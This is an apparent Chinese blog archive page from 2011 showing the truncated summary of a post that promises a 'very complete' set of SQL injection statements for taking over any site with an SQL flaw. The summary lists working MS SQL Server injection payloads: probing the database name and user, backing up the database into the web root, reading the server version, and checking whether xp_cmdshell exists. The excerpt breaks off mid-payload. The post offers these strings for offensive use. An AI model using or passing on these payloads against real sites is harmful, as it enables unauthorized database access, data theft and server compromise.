代码改变世界

随笔档案-2011年12月28日

很全的SQL注入语句,有SQL漏洞的都可以拿下

2011-12-28 08:51 by 狼人:-), 1329 阅读, 收藏, 编辑
摘要: 1、返回的是连接的数据库名 and db_name()>02、作用是获取连接用户名 and user>03、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5、判断xp_cmdshell扩展存储过程是否存在 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = & 阅读全文
点击右上角即可分享
微信分享提示